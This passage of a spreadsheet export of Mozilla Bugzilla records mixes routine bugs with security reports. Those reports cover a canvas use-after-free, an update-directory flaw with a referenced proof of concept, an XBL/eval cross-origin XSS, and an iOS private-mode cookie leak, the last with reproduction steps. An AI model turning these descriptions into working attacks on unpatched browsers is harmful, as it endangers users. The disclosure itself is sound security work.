#11    mozilla::gfx::DrawTargetWebgl::MaskSurface(mozilla::gfx::Pattern const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt;, mozilla::gfx::DrawOptions const&amp;) (libxul.so)
#12    mozilla::gfx::RecordedMaskSurface::PlayEvent(mozilla::gfx::Translator*) const (libxul.so)
#13    mozilla::gfx::RecordedEvent::DoWithEvent&lt;mozilla::gfx::MemReader&gt;(mozilla::gfx::MemReader&amp;, mozilla::gfx::RecordedEvent::EventType, std::function&lt;bool (mozilla::gfx::RecordedEvent*)&gt; const&amp;) (libxul.so)
#14    mozilla::layers::CanvasTranslator::TranslateRecording() (libxul.so)
#15    mozilla::detail::RunnableMethodImpl&lt;mozilla::layers::CanvasTranslator*, void (mozilla::layers::CanvasTranslator::*)(), true, (mozilla::RunnableKind)0, &gt;::Run() (libxul.so)
```
And freed at
```
#0    free (firefox)
#1    mozilla::gfx::DrawTargetSkia::Mask(mozilla::gfx::Pattern const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;) (libxul.so)
#2    mozilla::gfx::DrawTargetWebgl::DrawRectFallback(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;, mozilla::Maybe&lt;mozilla::gfx::DeviceColor&gt;, bool, bool, mozilla::gfx::StrokeOptions const*) (libxul.so)
#3    mozilla::gfx::DrawTargetWebgl::DrawRect(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;, mozilla::Maybe&lt;mozilla::gfx::DeviceColor&gt;, RefPtr&lt;mozilla::gfx::TextureHandle&gt;*, bool, bool, bool, bool, mozilla::gfx::StrokeOptions const*) (libxul.so)
#4    mozilla::gfx::DrawTargetWebgl::MaskSurface(mozilla::gfx::Pattern const&amp;, mozilla::gfx::SourceSurface*, mozilla::gfx::PointTyped&lt;mozilla::gfx::UnknownUnits, float&gt;, mozilla::gfx::DrawOptions const&amp;) (libxul.so)
#5    mozilla::gfx::RecordedMaskSurface::PlayEvent(mozilla::gfx::Translator*) const (libxul.so)
#6    mozilla::gfx::RecordedEvent::DoWithEvent&lt;mozilla::gfx::MemReader&gt;(mozilla::gfx::MemReader&amp;, mozilla::gfx::RecordedEvent::EventType, std::function&lt;bool (mozilla::gfx::RecordedEvent*)&gt; const&amp;) (libxul.so)
#7    mozilla::layers::CanvasTranslator::TranslateRecording() (libxul.so)
#8    mozilla::detail::RunnableMethodImpl&lt;mozilla::layers::CanvasTranslator*, void (mozilla::layers::CanvasTranslator::*)(), true, (mozilla::RunnableKind)0, &gt;::Run() (libxul.so)
#9    NS_ProcessNextEvent(nsIThread*, bool) (libxul.so)
#10    mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) (libxul.so)
#11    MessageLoop::Run() (libxul.so)
#12    nsThread::ThreadFunc(void*) (libxul.so)
#13    _pt_root (libnspr4.so)
#14    set_alt_signal_stack_and_start(PthreadCreateParams*) (firefox)
#15    start_thread (libc.so.6)
```
All three PHC-annotated crashes were found on Linux OSs.</t>
        </is>
      </c>
      <c r="X4310" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4311">
      <c r="A4311" t="n">
        <v>1281222</v>
      </c>
      <c r="B4311" t="inlineStr">
        <is>
          <t>2016-06-21 09:46:20 -0700</t>
        </is>
      </c>
      <c r="C4311" t="inlineStr">
        <is>
          <t>Don't use a configuration file in telemetry-batch-view</t>
        </is>
      </c>
      <c r="D4311" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E4311" t="n">
        <v>1</v>
      </c>
      <c r="F4311" t="n">
        <v>1</v>
      </c>
      <c r="G4311" t="n">
        <v>6</v>
      </c>
      <c r="H4311" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4311" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J4311" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K4311" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4311" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4311" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4311" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4311" t="inlineStr"/>
      <c r="Q4311" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4311" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4311" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4311" t="n">
        <v>1</v>
      </c>
      <c r="U4311" t="n">
        <v>0</v>
      </c>
      <c r="V4311" t="n">
        <v>2</v>
      </c>
      <c r="W4311" t="inlineStr">
        <is>
          <t>In order to make telemetry-batch-view Airflow friendly it should not depend on parameters specified in a configuration file.</t>
        </is>
      </c>
      <c r="X4311" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4312">
      <c r="A4312" t="n">
        <v>469293</v>
      </c>
      <c r="B4312" t="inlineStr">
        <is>
          <t>2008-12-12 02:14:31 -0800</t>
        </is>
      </c>
      <c r="C4312" t="inlineStr">
        <is>
          <t>3.2 patch from cvs fails to apply cleanly</t>
        </is>
      </c>
      <c r="D4312" t="inlineStr">
        <is>
          <t>2008-12-19 04:02:26 -0800</t>
        </is>
      </c>
      <c r="E4312" t="n">
        <v>1</v>
      </c>
      <c r="F4312" t="n">
        <v>1</v>
      </c>
      <c r="G4312" t="n">
        <v>4</v>
      </c>
      <c r="H4312" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4312" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J4312" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4312" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4312" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4312" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4312" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4312" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4312" t="inlineStr"/>
      <c r="Q4312" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4312" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4312" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4312" t="n">
        <v>0</v>
      </c>
      <c r="U4312" t="n">
        <v>0</v>
      </c>
      <c r="V4312" t="n">
        <v>2</v>
      </c>
      <c r="W4312" t="inlineStr">
        <is>
          <t>User-Agent:       Opera/9.27 (X11; Linux i686; U; en)
Build Identifier: cvs
cvs checkout as of "now".
patch gainst 3.2 has a lot of offset matches, few fuzzy matches and 3 hunks fail completely.
patching file Bugzilla/User.pm
Hunk #1 succeeded at 335 (offset 5 lines).
Hunk #3 succeeded at 652 (offset 5 lines).
Hunk #4 succeeded at 937 (offset 17 lines).
patching file Bugzilla/Error.pm
Hunk #2 succeeded at 115 (offset 4 lines).
patching file Bugzilla/Constants.pm
Hunk #1 succeeded at 131 (offset 5 lines).
Hunk #2 succeeded at 366 (offset 14 lines).
patching file template/en/default/global/common-links.html.tmpl
Hunk #1 FAILED at 103.
1 out of 1 hunk FAILED -- saving rejects to file template/en/default/global/common-links.html.tmpl.rej
patching file Bugzilla/WebService/User.pm
Hunk #1 succeeded at 125 (offset 15 lines).
patching file Bugzilla/Install/Filesystem.pm
patching file Bugzilla/DB/Mysql.pm
Hunk #1 succeeded at 690 with fuzz 2 (offset 77 lines).
patching file Bugzilla/Bug.pm
Hunk #1 succeeded at 2709 (offset 1395 lines).
patching file Bugzilla/Install.pm
patching file template/en/default/global/setting-descs.none.tmpl
Hunk #1 FAILED at 41.
1 out of 1 hunk FAILED -- saving rejects to file template/en/default/global/setting-descs.none.tmpl.rej
patching file Bugzilla/DB/Schema.pm
Hunk #1 FAILED at 1544.
1 out of 1 hunk FAILED -- saving rejects to file Bugzilla/DB/Schema.pm.rej
patching file editproducts.cgi
Hunk #1 succeeded at 370 with fuzz 1 (offset 160 lines).
patching file template/en/default/admin/products/confirm-delete.html.tmpl
patch unexpectedly ends in middle of line
Hunk #1 succeeded at 255 with fuzz 1 (offset 14 lines).
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4312" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4313">
      <c r="A4313" t="n">
        <v>685569</v>
      </c>
      <c r="B4313" t="inlineStr">
        <is>
          <t>2011-09-08 09:05:31 -0700</t>
        </is>
      </c>
      <c r="C4313" t="inlineStr">
        <is>
          <t>backport upstream buildbot revision e94483f9 to our repo</t>
        </is>
      </c>
      <c r="D4313" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4313" t="n">
        <v>1</v>
      </c>
      <c r="F4313" t="n">
        <v>1</v>
      </c>
      <c r="G4313" t="n">
        <v>5</v>
      </c>
      <c r="H4313" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4313" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4313" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4313" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4313" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4313" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4313" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4313" t="inlineStr">
        <is>
          <t>[buildbot]</t>
        </is>
      </c>
      <c r="Q4313" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4313" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4313" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4313" t="n">
        <v>1</v>
      </c>
      <c r="U4313" t="n">
        <v>0</v>
      </c>
      <c r="V4313" t="n">
        <v>7</v>
      </c>
      <c r="W4313" t="inlineStr">
        <is>
          <t>this allows for slave-initiated graceful shutdowns, which is nice.
also, it makes idleizer work properly.</t>
        </is>
      </c>
      <c r="X4313" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4314">
      <c r="A4314" t="n">
        <v>1246972</v>
      </c>
      <c r="B4314" t="inlineStr">
        <is>
          <t>2016-02-09 08:45:20 -0800</t>
        </is>
      </c>
      <c r="C4314" t="inlineStr">
        <is>
          <t>Arbitrary target directory for result files of update process</t>
        </is>
      </c>
      <c r="D4314" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:20 -0700</t>
        </is>
      </c>
      <c r="E4314" t="n">
        <v>1</v>
      </c>
      <c r="F4314" t="n">
        <v>1</v>
      </c>
      <c r="G4314" t="n">
        <v>3</v>
      </c>
      <c r="H4314" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4314" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4314" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4314" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4314" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4314" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4314" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4314" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4314" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+]</t>
        </is>
      </c>
      <c r="Q4314" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4314" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4314" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T4314" t="n">
        <v>1</v>
      </c>
      <c r="U4314" t="n">
        <v>0</v>
      </c>
      <c r="V4314" t="n">
        <v>100</v>
      </c>
      <c r="W4314" t="inlineStr">
        <is>
          <t>Created attachment 8717491
invalid.loc.poc.zip
It's possible to choose an arbitrary target directory for result files of an update process. As in Bug 1177861 this leads to the possibility to change arbitrary files because for example extracted *.patch files from the .mar file are also placed in this directory.
I have tested the poc with win7 and ff 47 nightly installed to C:\Program Files (x86)\Nightly\:
To reproduce
- download poc and extract the files
- download http://releases.mozilla.org/pub/firefox/nightly/latest-mozilla-central/firefox-47.0a1.en-US.win32.complete.mar and place the file to &lt;pocdir&gt;/updatework/update.mar 
- execute poc.rb
- a firefox directory will appear next to the poc.rb
As seen in Bug 1177861 a more advance poc can change arbitrary files through manipulating *.patch files and the use of junctions.</t>
        </is>
      </c>
      <c r="X4314" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4315">
      <c r="A4315" t="n">
        <v>704622</v>
      </c>
      <c r="B4315" t="inlineStr">
        <is>
          <t>2011-11-22 13:57:46 -0800</t>
        </is>
      </c>
      <c r="C4315" t="inlineStr">
        <is>
          <t>[1.9.2] .jar should not be openable on Mac or Linux, download only (CVE-2011-3666)</t>
        </is>
      </c>
      <c r="D4315" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E4315" t="n">
        <v>1</v>
      </c>
      <c r="F4315" t="n">
        <v>1</v>
      </c>
      <c r="G4315" t="n">
        <v>6</v>
      </c>
      <c r="H4315" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4315" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4315" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K4315" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L4315" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4315" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4315" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4315" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4315" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q4315" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4315" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4315" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4315" t="n">
        <v>1</v>
      </c>
      <c r="U4315" t="n">
        <v>0</v>
      </c>
      <c r="V4315" t="n">
        <v>24</v>
      </c>
      <c r="W4315" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #663899 +++
+++ This bug was initially created as a clone of Bug #662309 +++
A patch was landed for this in 1.9.23, but it did not fix the problem on the 1.9.2 branch. See bug 663899 comment 85</t>
        </is>
      </c>
      <c r="X4315" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4316">
      <c r="A4316" t="n">
        <v>332803</v>
      </c>
      <c r="B4316" t="inlineStr">
        <is>
          <t>2006-04-05 03:17:46 -0700</t>
        </is>
      </c>
      <c r="C4316" t="inlineStr">
        <is>
          <t>elements with xsi:type are not validated on form load</t>
        </is>
      </c>
      <c r="D4316" t="inlineStr">
        <is>
          <t>2016-07-15 14:46:57 -0700</t>
        </is>
      </c>
      <c r="E4316" t="n">
        <v>1</v>
      </c>
      <c r="F4316" t="n">
        <v>1</v>
      </c>
      <c r="G4316" t="n">
        <v>6</v>
      </c>
      <c r="H4316" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4316" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4316" t="inlineStr">
        <is>
          <t>XForms</t>
        </is>
      </c>
      <c r="K4316" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4316" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4316" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4316" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4316" t="inlineStr"/>
      <c r="Q4316" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4316" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4316" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4316" t="n">
        <v>1</v>
      </c>
      <c r="U4316" t="n">
        <v>0</v>
      </c>
      <c r="V4316" t="n">
        <v>9</v>
      </c>
      <c r="W4316" t="inlineStr">
        <is>
          <t>We do not seem to validate elements with types set directly by xsi:type on form load.</t>
        </is>
      </c>
      <c r="X4316" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4317">
      <c r="A4317" t="n">
        <v>468581</v>
      </c>
      <c r="B4317" t="inlineStr">
        <is>
          <t>2008-12-09 01:02:06 -0800</t>
        </is>
      </c>
      <c r="C4317" t="inlineStr">
        <is>
          <t>XSS using a chrome XBL method and window.eval</t>
        </is>
      </c>
      <c r="D4317" t="inlineStr">
        <is>
          <t>2009-05-26 14:03:13 -0700</t>
        </is>
      </c>
      <c r="E4317" t="n">
        <v>1</v>
      </c>
      <c r="F4317" t="n">
        <v>1</v>
      </c>
      <c r="G4317" t="n">
        <v>3</v>
      </c>
      <c r="H4317" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4317" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4317" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4317" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4317" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4317" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4317" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4317" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4317" t="inlineStr">
        <is>
          <t>[sg:high] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4317" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4317" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4317" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T4317" t="n">
        <v>1</v>
      </c>
      <c r="U4317" t="n">
        <v>0</v>
      </c>
      <c r="V4317" t="n">
        <v>13</v>
      </c>
      <c r="W4317" t="inlineStr">
        <is>
          <t>http://mxr.mozilla.org/mozilla-central/source/js/src/jsobj.cpp#1260
1260             if (obj != callerScopeChain) {
1261                 ok = js_CheckPrincipalsAccess(cx, obj,
1262                                               caller-&gt;script-&gt;principals,
1263                                               cx-&gt;runtime-&gt;atomState.evalAtom);
1264                 if (!ok)
1265                     goto out;
1266 
1267                 scopeobj = js_NewWithObject(cx, obj, callerScopeChain, -1);
caller-&gt;script-&gt;principals can be the wrong principal when caller is a cloned
function.  And, when obj_eval is called via XPC_XOW_FunctionWrapper, |obj| is a
window object not wrapped in XOW.  Thus, by using a chrome XBL method and
window.eval, it's possible to access properties of a cross-origin window.
fx2 is not vulnerable since fx2 has the security checks for the window object. 
(By using a chrome XBL method, it's possible to execute eval() with a
cross-origin window, but it's not possible to access properties of the
cross-origin window.)</t>
        </is>
      </c>
      <c r="X4317" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4318">
      <c r="A4318" t="n">
        <v>513981</v>
      </c>
      <c r="B4318" t="inlineStr">
        <is>
          <t>2009-09-01 12:22:25 -0700</t>
        </is>
      </c>
      <c r="C4318" t="inlineStr">
        <is>
          <t>TM: possible GC rooting bug with Google Docs</t>
        </is>
      </c>
      <c r="D4318" t="inlineStr">
        <is>
          <t>2013-02-25 16:52:31 -0800</t>
        </is>
      </c>
      <c r="E4318" t="n">
        <v>1</v>
      </c>
      <c r="F4318" t="n">
        <v>1</v>
      </c>
      <c r="G4318" t="n">
        <v>3</v>
      </c>
      <c r="H4318" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4318" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4318" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4318" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4318" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4318" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey [sg:critical]</t>
        </is>
      </c>
      <c r="Q4318" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4318" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4318" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4318" t="n">
        <v>1</v>
      </c>
      <c r="U4318" t="n">
        <v>0</v>
      </c>
      <c r="V4318" t="n">
        <v>24</v>
      </c>
      <c r="W4318" t="inlineStr">
        <is>
          <t>This is a secondary bug from bug 504797. To reproduce, use this rev with a debug build:
changeset:   32107:e8a55ae8fb98
tag:         qparent
user:        Andreas Gal &lt;gal@mozilla.com&gt;
date:        Mon Aug 31 17:02:16 2009 -0700
summary:     Compilation fix for bug 513787.
and create a new document in Google Docs. You may get a slow script dialog, but if you continue it will crash eventually inside array_slice called from trace.
The problem is that the array created by js_NewArrayObject at the end of array_slice (the non-dense case) gets GC'd (and its fields overwritten) while it is being populated in the loop. I showed that by printing field values immediately after allocation and then inside SetArrayElement. I also tried adding a new JSAutoTempValueRooter right after the call to js_NewArrayObject and that stopped the problem.</t>
        </is>
      </c>
      <c r="X4318" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4319">
      <c r="A4319" t="n">
        <v>1670127</v>
      </c>
      <c r="B4319" t="inlineStr">
        <is>
          <t>2020-10-08 15:31:50 -0700</t>
        </is>
      </c>
      <c r="C4319" t="inlineStr">
        <is>
          <t>File download request in Firefox iOS shares private browsing mode cookie</t>
        </is>
      </c>
      <c r="D4319" t="inlineStr">
        <is>
          <t>2024-05-30 10:19:38 -0700</t>
        </is>
      </c>
      <c r="E4319" t="n">
        <v>1</v>
      </c>
      <c r="F4319" t="n">
        <v>1</v>
      </c>
      <c r="G4319" t="n">
        <v>2</v>
      </c>
      <c r="H4319" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4319" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4319" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4319" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4319" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4319" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4319" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q4319" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4319" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4319" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4319" t="n">
        <v>1</v>
      </c>
      <c r="U4319" t="n">
        <v>0</v>
      </c>
      <c r="V4319" t="n">
        <v>7</v>
      </c>
      <c r="W4319" t="inlineStr">
        <is>
          <t>Created attachment 9180571
fxios_private_bypass_by_download.mp4
Similar to Bug 1663261 in Fenix, Firefox iOS also shares private mode cookie with normal browsing context.
When user taps download link, actual file download request is sent from Swift side HTTP client (below).
https://github.com/mozilla-mobile/firefox-ios/blob/1aa4bb892c60ff346df0eab30691578282947618/Client/Frontend/Browser/DownloadQueue.swift#L58
But this client doesn't check whether the requested browsing context was private mode or not.
Steps to reproduce the issue is below:
1. Visit http://csrf.jp/2020/dl_fxios in private browsing mode
2. Tap `set_cookie.php` link, then a tracking cookie `id` is set
3. Visit http://csrf.jp/2020/dl_fxios again in normal browsing mode
4. Tap `get_cookie.php` link, then the recorded cookie `id` in step 2 is shown in the downloaded contents</t>
        </is>
      </c>
      <c r="X4319" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4320">
      <c r="A4320" t="n">
        <v>712678</v>
      </c>
      <c r="B4320" t="inlineStr">
        <is>
          <t>2011-12-21 09:26:02 -0800</t>
        </is>
      </c>
      <c r="C4320" t="inlineStr">
        <is>
          <t>Put Android-XUL Aurora and Nightly builds on separate update channels</t>
        </is>
      </c>
      <c r="D4320" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4320" t="n">
        <v>1</v>
      </c>
      <c r="F4320" t="n">
        <v>1</v>
      </c>
      <c r="G4320" t="n">
        <v>5</v>
      </c>
      <c r="H4320" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4320" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4320" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4320" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4320" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4320" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4320" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4320" t="inlineStr">
        <is>
          <t>[mobile][updates]</t>
        </is>
      </c>
      <c r="Q4320" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4320" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4320" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4320" t="n">
        <v>1</v>
      </c>
      <c r="U4320" t="n">
        <v>0</v>
      </c>
      <c r="V4320" t="n">
        <v>29</v>
      </c>
      <c r="W4320" t="inlineStr">
        <is>
          <t>For Firefox 11 we are shipping two different products: Native Fennec and XUL Fennec.  We produce aurora and nightly builds for both products, but currently we have only one "aurora" and one "nightly" update channel.  This means that people who download the XUL Fennec nightly get updated to Native Fennec instead of XUL Fennec.
To enable people to test XUL Fennec on aurora and nightly, can we create separate update channels ("aurora-xul" and "nightly-xul"?) that will be used for the XUL builds and will receive updates to newer XUL builds?
(In a separate bug, we might also want to add "Android Tablet" download links to the nightly and aurora download pages.)</t>
        </is>
      </c>
      <c r="X4320" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4321">
      <c r="A4321" t="n">
        <v>860123</v>
      </c>
      <c r="B4321" t="inlineStr">
        <is>
          <t>2013-04-09 18:00:12 -0700</t>
        </is>
      </c>
      <c r="C4321" t="inlineStr">
        <is>
          <t>"ASSERTION: Must have the same owner document" with editor, sel.selectAllChildren()</t>
        </is>
      </c>
      <c r="D4321" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:28 -0800</t>
        </is>
      </c>
      <c r="E4321" t="n">
        <v>1</v>
      </c>
      <c r="F4321" t="n">
        <v>1</v>
      </c>
      <c r="G4321" t="n">
        <v>3</v>
      </c>
      <c r="H4321" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4321" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4321" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4321" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4321" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4321" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4321" t="inlineStr">
        <is>
